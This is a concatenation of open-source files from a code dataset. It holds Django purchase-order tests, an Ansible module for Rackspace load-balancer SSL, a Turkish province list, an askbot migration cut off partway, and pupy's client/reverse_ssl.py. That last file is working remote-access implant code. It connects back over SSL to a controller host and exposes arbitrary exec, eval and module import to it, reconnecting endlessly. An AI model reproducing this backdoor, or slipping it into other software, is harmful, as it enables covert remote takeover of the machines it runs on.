'stock',
'order'
]
def test_basics(self):
""" Basic tests e.g. repr functions etc """
order = PurchaseOrder.objects.get(pk=1)
self.assertEqual(order.get_absolute_url(), '/order/purchase-order/1/')
self.assertEqual(str(order), 'PO0001 - ACME')
line = PurchaseOrderLineItem.objects.get(pk=1)
self.assertEqual(str(line), "100 x ACME0001 from ACME (for PO0001 - ACME)")
def test_overdue(self):
"""
Test overdue status functionality
"""
today = datetime.now().date()
order = PurchaseOrder.objects.get(pk=1)
self.assertFalse(order.is_overdue)
order.target_date = today - timedelta(days=5)
order.save()
self.assertTrue(order.is_overdue)
order.target_date = today + timedelta(days=1)
order.save()
self.assertFalse(order.is_overdue)
def test_on_order(self):
""" There should be 3 separate items on order for the M2x4 LPHS part """
part = Part.objects.get(name='M2x4 LPHS')
open_orders = []
for supplier in part.supplier_parts.all():
open_orders += supplier.open_orders()
self.assertEqual(len(open_orders), 4)
# Test the total on-order quantity
self.assertEqual(part.on_order, 1400)
def test_add_items(self):
""" Test functions for adding line items to an order """
order = PurchaseOrder.objects.get(pk=1)
self.assertEqual(order.status, PurchaseOrderStatus.PENDING)
self.assertEqual(order.lines.count(), 4)
sku = SupplierPart.objects.get(SKU='ACME-WIDGET')
part = sku.part
# Try to order some invalid things
with self.assertRaises(django_exceptions.ValidationError):
order.add_line_item(sku, -999)
with self.assertRaises(django_exceptions.ValidationError):
order.add_line_item(sku, 'not a number')
# Order the part
self.assertEqual(part.on_order, 0)
order.add_line_item(sku, 100)
self.assertEqual(part.on_order, 100)
self.assertEqual(order.lines.count(), 5)
# Order the same part again (it should be merged)
order.add_line_item(sku, 50)
self.assertEqual(order.lines.count(), 5)
self.assertEqual(part.on_order, 150)
# Try to order a supplier part from the wrong supplier
sku = SupplierPart.objects.get(SKU='ZERG-WIDGET')
with self.assertRaises(django_exceptions.ValidationError):
order.add_line_item(sku, 99)
def test_pricing(self):
""" Test functions for adding line items to an order including price-breaks """
order = PurchaseOrder.objects.get(pk=7)
self.assertEqual(order.status, PurchaseOrderStatus.PENDING)
self.assertEqual(order.lines.count(), 0)
sku = SupplierPart.objects.get(SKU='ZERGM312')
part = sku.part
# Order the part
self.assertEqual(part.on_order, 0)
# Order 25 with manually set high value
pp = sku.get_price(25)
order.add_line_item(sku, 25, purchase_price=pp)
self.assertEqual(part.on_order, 25)
self.assertEqual(order.lines.count(), 1)
self.assertEqual(order.lines.first().purchase_price.amount, 200)
# Add a few, now the pricebreak should adjust although wrong price given
order.add_line_item(sku, 10, purchase_price=sku.get_price(25))
self.assertEqual(part.on_order, 35)
self.assertEqual(order.lines.count(), 1)
self.assertEqual(order.lines.first().purchase_price.amount, 8)
# Order the same part again (it should be merged)
order.add_line_item(sku, 100, purchase_price=sku.get_price(100))
self.assertEqual(order.lines.count(), 1)
self.assertEqual(part.on_order, 135)
self.assertEqual(order.lines.first().purchase_price.amount, 1.25)
def test_receive(self):
""" Test order receiving functions """
part = Part.objects.get(name='M2x4 LPHS')
# Receive some items
line = PurchaseOrderLineItem.objects.get(id=1)
order = line.order
loc = StockLocation.objects.get(id=1)
# There should be two lines against this order
self.assertEqual(len(order.pending_line_items()), 4)
# Should fail, as order is 'PENDING' not 'PLACED"
self.assertEqual(order.status, PurchaseOrderStatus.PENDING)
with self.assertRaises(django_exceptions.ValidationError):
order.receive_line_item(line, loc, 50, user=None)
order.place_order()
self.assertEqual(order.status, PurchaseOrderStatus.PLACED)
order.receive_line_item(line, loc, 50, user=None)
self.assertEqual(line.remaining(), 50)
self.assertEqual(part.on_order, 1350)
# Try to order some invalid things
with self.assertRaises(django_exceptions.ValidationError):
order.receive_line_item(line, loc, -10, user=None)
with self.assertRaises(django_exceptions.ValidationError):
order.receive_line_item(line, loc, 'not a number', user=None)
# Receive the rest of the items
order.receive_line_item(line, loc, 50, user=None)
line = PurchaseOrderLineItem.objects.get(id=2)
order.receive_line_item(line, loc, 500, user=None)
self.assertEqual(part.on_order, 800)
self.assertEqual(order.status, PurchaseOrderStatus.PLACED)
for line in order.pending_line_items():
order.receive_line_item(line, loc, line.quantity, user=None)
self.assertEqual(order.status, PurchaseOrderStatus.COMPLETE)
| mit |
dgarros/ansible | lib/ansible/modules/cloud/rackspace/rax_clb_ssl.py | 70 | 9636 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION='''
module: rax_clb_ssl
short_description: Manage SSL termination for a Rackspace Cloud Load Balancer.
description:
- Set up, reconfigure, or remove SSL termination for an existing load balancer.
version_added: "2.0"
options:
loadbalancer:
description:
- Name or ID of the load balancer on which to manage SSL termination.
required: true
state:
description:
- If set to "present", SSL termination will be added to this load balancer.
- If "absent", SSL termination will be removed instead.
choices:
- present
- absent
default: present
enabled:
description:
- If set to "false", temporarily disable SSL termination without discarding
- existing credentials.
default: true
private_key:
description:
- The private SSL key as a string in PEM format.
certificate:
description:
- The public SSL certificates as a string in PEM format.
intermediate_certificate:
description:
- One or more intermediate certificate authorities as a string in PEM
- format, concatenated into a single string.
secure_port:
description:
- The port to listen for secure traffic.
default: 443
secure_traffic_only:
description:
- If "true", the load balancer will *only* accept secure traffic.
default: false
https_redirect:
description:
- If "true", the load balancer will redirect HTTP traffic to HTTPS.
- Requires "secure_traffic_only" to be true. Incurs an implicit wait if SSL
- termination is also applied or removed.
wait:
description:
- Wait for the balancer to be in state "running" before turning.
default: false
wait_timeout:
description:
- How long before "wait" gives up, in seconds.
default: 300
author: Ash Wilson
extends_documentation_fragment: rackspace
'''
EXAMPLES = '''
- name: Enable SSL termination on a load balancer
rax_clb_ssl:
loadbalancer: the_loadbalancer
state: present
private_key: "{{ lookup('file', 'credentials/server.key' ) }}"
certificate: "{{ lookup('file', 'credentials/server.crt' ) }}"
intermediate_certificate: "{{ lookup('file', 'credentials/trust-chain.crt') }}"
secure_traffic_only: true
wait: true
- name: Disable SSL termination
rax_clb_ssl:
loadbalancer: "{{ registered_lb.balancer.id }}"
state: absent
wait: true
'''
try:
import pyrax
HAS_PYRAX = True
except ImportError:
HAS_PYRAX = False
def cloud_load_balancer_ssl(module, loadbalancer, state, enabled, private_key,
certificate, intermediate_certificate, secure_port,
secure_traffic_only, https_redirect,
wait, wait_timeout):
# Validate arguments.
if state == 'present':
if not private_key:
module.fail_json(msg="private_key must be provided.")
else:
private_key = private_key.strip()
if not certificate:
module.fail_json(msg="certificate must be provided.")
else:
certificate = certificate.strip()
attempts = wait_timeout / 5
# Locate the load balancer.
balancer = rax_find_loadbalancer(module, pyrax, loadbalancer)
existing_ssl = balancer.get_ssl_termination()
changed = False
if state == 'present':
# Apply or reconfigure SSL termination on the load balancer.
ssl_attrs = dict(
securePort=secure_port,
privatekey=private_key,
certificate=certificate,
intermediateCertificate=intermediate_certificate,
enabled=enabled,
secureTrafficOnly=secure_traffic_only
)
needs_change = False
if existing_ssl:
for ssl_attr, value in ssl_attrs.items():
if ssl_attr == 'privatekey':
# The private key is not included in get_ssl_termination's
# output (as it shouldn't be). Also, if you're changing the
# private key, you'll also be changing the certificate,
# so we don't lose anything by not checking it.
continue
if value is not None and existing_ssl.get(ssl_attr) != value:
# module.fail_json(msg='Unnecessary change', attr=ssl_attr, value=value, existing=existing_ssl.get(ssl_attr))
needs_change = True
else:
needs_change = True
if needs_change:
try:
balancer.add_ssl_termination(**ssl_attrs)
except pyrax.exceptions.PyraxException as e:
module.fail_json(msg='%s' % e.message)
changed = True
elif state == 'absent':
# Remove SSL termination if it's already configured.
if existing_ssl:
try:
balancer.delete_ssl_termination()
except pyrax.exceptions.PyraxException as e:
module.fail_json(msg='%s' % e.message)
changed = True
if https_redirect is not None and balancer.httpsRedirect != https_redirect:
if changed:
# This wait is unavoidable because load balancers are immutable
# while the SSL termination changes above are being applied.
pyrax.utils.wait_for_build(balancer, interval=5, attempts=attempts)
try:
balancer.update(httpsRedirect=https_redirect)
except pyrax.exceptions.PyraxException as e:
module.fail_json(msg='%s' % e.message)
changed = True
if changed and wait:
pyrax.utils.wait_for_build(balancer, interval=5, attempts=attempts)
balancer.get()
new_ssl_termination = balancer.get_ssl_termination()
# Intentionally omit the private key from the module output, so you don't
# accidentally echo it with `ansible-playbook -v` or `debug`, and the
# certificate, which is just long. Convert other attributes to snake_case
# and include https_redirect at the top-level.
if new_ssl_termination:
new_ssl = dict(
enabled=new_ssl_termination['enabled'],
secure_port=new_ssl_termination['securePort'],
secure_traffic_only=new_ssl_termination['secureTrafficOnly']
)
else:
new_ssl = None
result = dict(
changed=changed,
https_redirect=balancer.httpsRedirect,
ssl_termination=new_ssl,
balancer=rax_to_dict(balancer, 'clb')
)
success = True
if balancer.status == 'ERROR':
result['msg'] = '%s failed to build' % balancer.id
success = False
elif wait and balancer.status not in ('ACTIVE', 'ERROR'):
result['msg'] = 'Timeout waiting on %s' % balancer.id
success = False
if success:
module.exit_json(**result)
else:
module.fail_json(**result)
def main():
argument_spec = rax_argument_spec()
argument_spec.update(dict(
loadbalancer=dict(required=True),
state=dict(default='present', choices=['present', 'absent']),
enabled=dict(type='bool', default=True),
private_key=dict(),
certificate=dict(),
intermediate_certificate=dict(),
secure_port=dict(type='int', default=443),
secure_traffic_only=dict(type='bool', default=False),
https_redirect=dict(type='bool'),
wait=dict(type='bool', default=False),
wait_timeout=dict(type='int', default=300)
))
module = AnsibleModule(
argument_spec=argument_spec,
required_together=rax_required_together(),
)
if not HAS_PYRAX:
module.fail_json(msg='pyrax is required for this module.')
loadbalancer = module.params.get('loadbalancer')
state = module.params.get('state')
enabled = module.boolean(module.params.get('enabled'))
private_key = module.params.get('private_key')
certificate = module.params.get('certificate')
intermediate_certificate = module.params.get('intermediate_certificate')
secure_port = module.params.get('secure_port')
secure_traffic_only = module.boolean(module.params.get('secure_traffic_only'))
https_redirect = module.boolean(module.params.get('https_redirect'))
wait = module.boolean(module.params.get('wait'))
wait_timeout = module.params.get('wait_timeout')
setup_rax_module(module, pyrax)
cloud_load_balancer_ssl(
module, loadbalancer, state, enabled, private_key, certificate,
intermediate_certificate, secure_port, secure_traffic_only,
https_redirect, wait, wait_timeout
)
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *
if __name__ == '__main__':
main()
| gpl-3.0 |
potatolondon/django-nonrel-1-4 | django/contrib/localflavor/tr/tr_provinces.py | 316 | 2191 | # -*- coding: utf-8 -*-
"""
This exists in this standalone file so that it's only imported into memory
when explicitly needed.
"""
PROVINCE_CHOICES = (
('01', ('Adana')),
('02', ('Adıyaman')),
('03', ('Afyonkarahisar')),
('04', ('Ağrı')),
('68', ('Aksaray')),
('05', ('Amasya')),
('06', ('Ankara')),
('07', ('Antalya')),
('75', ('Ardahan')),
('08', ('Artvin')),
('09', ('Aydın')),
('10', ('Balıkesir')),
('74', ('Bartın')),
('72', ('Batman')),
('69', ('Bayburt')),
('11', ('Bilecik')),
('12', ('Bingöl')),
('13', ('Bitlis')),
('14', ('Bolu')),
('15', ('Burdur')),
('16', ('Bursa')),
('17', ('Çanakkale')),
('18', ('Çankırı')),
('19', ('Çorum')),
('20', ('Denizli')),
('21', ('Diyarbakır')),
('81', ('Düzce')),
('22', ('Edirne')),
('23', ('Elazığ')),
('24', ('Erzincan')),
('25', ('Erzurum')),
('26', ('Eskişehir')),
('27', ('Gaziantep')),
('28', ('Giresun')),
('29', ('Gümüşhane')),
('30', ('Hakkari')),
('31', ('Hatay')),
('76', ('Iğdır')),
('32', ('Isparta')),
('33', ('Mersin')),
('34', ('İstanbul')),
('35', ('İzmir')),
('78', ('Karabük')),
('36', ('Kars')),
('37', ('Kastamonu')),
('38', ('Kayseri')),
('39', ('Kırklareli')),
('40', ('Kırşehir')),
('41', ('Kocaeli')),
('42', ('Konya')),
('43', ('Kütahya')),
('44', ('Malatya')),
('45', ('Manisa')),
('46', ('Kahramanmaraş')),
('70', ('Karaman')),
('71', ('Kırıkkale')),
('79', ('Kilis')),
('47', ('Mardin')),
('48', ('Muğla')),
('49', ('Muş')),
('50', ('Nevşehir')),
('51', ('Niğde')),
('52', ('Ordu')),
('80', ('Osmaniye')),
('53', ('Rize')),
('54', ('Sakarya')),
('55', ('Samsun')),
('56', ('Siirt')),
('57', ('Sinop')),
('58', ('Sivas')),
('73', ('Şırnak')),
('59', ('Tekirdağ')),
('60', ('Tokat')),
('61', ('Trabzon')),
('62', ('Tunceli')),
('63', ('Şanlıurfa')),
('64', ('Uşak')),
('65', ('Van')),
('77', ('Yalova')),
('66', ('Yozgat')),
('67', ('Zonguldak')),
)
| bsd-3-clause |
shaheemirza/pupy | client/reverse_ssl.py | 11 | 2928 | #!/usr/bin/env python
# -*- coding: UTF8 -*-
import site
import sys
import time
import rpyc
from rpyc.core.service import Service, ModuleNamespace
from rpyc.lib.compat import execute, is_py3k
import threading
import weakref
import traceback
import os
import subprocess
import threading
import multiprocessing
import logging
import StringIO
import json
import urllib2
import urllib
import platform
import re
import ssl
import random
import imp
class ReverseSlaveService(Service):
""" Pupy reverse shell rpyc service """
__slots__=["exposed_namespace"]
def on_connect(self):
self.exposed_namespace = {}
self._conn._config.update(dict(
allow_all_attrs = True,
allow_public_attrs = True,
allow_pickle = True,
allow_getattr = True,
allow_setattr = True,
allow_delattr = True,
import_custom_exceptions = False,
propagate_SystemExit_locally=False,
propagate_KeyboardInterrupt_locally=True,
instantiate_custom_exceptions = True,
instantiate_oldstyle_exceptions = True,
))
# shortcuts
self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule))
def exposed_exit(self):
raise KeyboardInterrupt
def exposed_execute(self, text):
"""execute arbitrary code (using ``exec``)"""
execute(text, self.exposed_namespace)
def exposed_eval(self, text):
"""evaluate arbitrary code (using ``eval``)"""
return eval(text, self.exposed_namespace)
def exposed_getmodule(self, name):
"""imports an arbitrary module"""
return __import__(name, None, None, "*")
def exposed_getconn(self):
"""returns the local connection instance to the other side"""
return self._conn
def get_next_wait(attempt):
return 0.5
if attempt<60:
return 0.5
else:
return random.randint(15,30)
def add_pseudo_pupy_module(HOST):
if not "pupy" in sys.modules:
mod = imp.new_module("pupy")
mod.__name__="pupy"
mod.__file__="<memimport>\\\\pupy"
mod.__package__="pupy"
sys.modules["pupy"]=mod
mod.get_connect_back_host=(lambda : HOST)
mod.pseudo=True
def main():
HOST="127.0.0.1:443"
if "windows" in platform.system().lower():
try:
import pupy
HOST=pupy.get_connect_back_host()
except ImportError:
print "Warning : ImportError: pupy builtin module not found ! please start pupy from either it's exe stub or it's reflective DLL"
if len(sys.argv)!=2:
exit("usage: %s host:port"%sys.argv[0])
HOST=sys.argv[1]
else:
add_pseudo_pupy_module(HOST)
attempt=0
while True:
try:
rhost,rport=None,None
tab=HOST.rsplit(":",1)
rhost=tab[0]
if len(tab)==2:
rport=int(tab[1])
else:
rport=443
print "connecting to %s:%s"%(rhost,rport)
conn=rpyc.ssl_connect(rhost, rport, service = ReverseSlaveService)
while True:
attempt=0
conn.serve()
except KeyboardInterrupt:
print "keyboard interrupt received !"
break
except Exception as e:
time.sleep(get_next_wait(attempt))
attempt+=1
if __name__=="__main__":
main()
| bsd-3-clause |
alexproca/askbot-devel | askbot/migrations/0038_add_tag_filter_strategies.py | 13 | 26661 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from askbot import const
from askbot.migrations_api import safe_add_column
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model country fields to the model auth_user
safe_add_column(
u'auth_user',
'email_tag_filter_strategy',
self.gf(
'django.db.models.fields.SmallIntegerField'
)(default = const.EXCLUDE_IGNORED)
)
safe_add_column(
u'auth_user',
'display_tag_filter_strategy',
self.gf(
'django.db.models.fields.SmallIntegerField'
)(default = const.INCLUDE_ALL)
)
def backwards(self, orm):
db.delete_column(u'auth_user', 'email_tag_filter_strategy')
db.delete_column(u'auth_user', 'display_tag_filter_strategy')
models = {
'askbot.activity': {
'Meta': {'object_name': 'Activity', 'db_table': "u'activity'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'activity_type': ('django.db.models.fields.SmallIntegerField', [], {}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_auditted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Question']", 'null': 'True'}),
'receiving_users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'received_activity'", 'to': "orm['auth.User']"}),
'recipients': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'incoming_activity'", 'through': "'ActivityAuditStatus'", 'to': "orm['auth.User']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'askbot.activityauditstatus': {
'Meta': {'unique_together': "(('user', 'activity'),)", 'object_name': 'ActivityAuditStatus'},
'activity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Activity']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'askbot.anonymousanswer': {
'Meta': {'object_name': 'AnonymousAnswer'},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_addr': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'anonymous_answers'", 'to': "orm['askbot.Question']"}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '180'}),
'text': ('django.db.models.fields.TextField', [], {}),
'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'})
},
'askbot.anonymousquestion': {
'Meta': {'object_name': 'AnonymousQuestion'},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_addr': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '180'}),
'tagnames': ('django.db.models.fields.CharField', [], {'max_length': '125'}),
'text': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'})
},
'askbot.answer': {
'Meta': {'object_name': 'Answer', 'db_table': "u'answer'"},
'accepted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'accepted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answers'", 'to': "orm['auth.User']"}),
'comment_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'deleted_answers'", 'null': 'True', 'to': "orm['auth.User']"}),
'html': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_edited_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_edited_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'last_edited_answers'", 'null': 'True', 'to': "orm['auth.User']"}),
'locked': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'locked_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'locked_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'locked_answers'", 'null': 'True', 'to': "orm['auth.User']"}),
'offensive_flag_count': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answers'", 'to': "orm['askbot.Question']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'text': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'vote_down_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'vote_up_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'wikified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'askbot.answerrevision': {
'Meta': {'object_name': 'AnswerRevision', 'db_table': "u'answer_revision'"},
'answer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['askbot.Answer']"}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answerrevisions'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'revised_at': ('django.db.models.fields.DateTimeField', [], {}),
'revision': ('django.db.models.fields.PositiveIntegerField', [], {}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'text': ('django.db.models.fields.TextField', [], {})
},
'askbot.award': {
'Meta': {'object_name': 'Award', 'db_table': "u'award'"},
'awarded_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'badge': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'award_badge'", 'to': "orm['askbot.BadgeData']"}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notified': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'award_user'", 'to': "orm['auth.User']"})
},
'askbot.badgedata': {
'Meta': {'object_name': 'BadgeData'},
'awarded_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'awarded_to': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'badges'", 'through': "'Award'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'askbot.comment': {
'Meta': {'object_name': 'Comment', 'db_table': "u'comment'"},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'comment': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'html': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '2048'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'comments'", 'to': "orm['auth.User']"})
},
'askbot.emailfeedsetting': {
'Meta': {'object_name': 'EmailFeedSetting'},
'added_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'feed_type': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'frequency': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'reported_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'subscriber': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'notification_subscriptions'", 'to': "orm['auth.User']"})
},
'askbot.favoritequestion': {
'Meta': {'object_name': 'FavoriteQuestion', 'db_table': "u'favorite_question'"},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Question']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_favorite_questions'", 'to': "orm['auth.User']"})
},
'askbot.markedtag': {
'Meta': {'object_name': 'MarkedTag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'reason': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_selections'", 'to': "orm['askbot.Tag']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tag_selections'", 'to': "orm['auth.User']"})
},
'askbot.question': {
'Meta': {'object_name': 'Question', 'db_table': "u'question'"},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'answer_accepted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'answer_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'questions'", 'to': "orm['auth.User']"}),
'close_reason': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'closed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'closed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'closed_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'closed_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
'comment_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'deleted_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
'favorited_by': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'favorite_questions'", 'through': "'FavoriteQuestion'", 'to': "orm['auth.User']"}),
'favourite_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'followed_by': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'followed_questions'", 'to': "orm['auth.User']"}),
'html': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_activity_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_activity_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'last_active_in_questions'", 'to': "orm['auth.User']"}),
'last_edited_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_edited_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'last_edited_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
'locked': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'locked_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'locked_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'locked_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
'offensive_flag_count': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '180'}),
'tagnames': ('django.db.models.fields.CharField', [], {'max_length': '125'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'questions'", 'to': "orm['askbot.Tag']"}),
'text': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'vote_down_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'vote_up_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'wikified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'askbot.questionrevision': {
'Meta': {'object_name': 'QuestionRevision', 'db_table': "u'question_revision'"},
'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'questionrevisions'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['askbot.Question']"}),
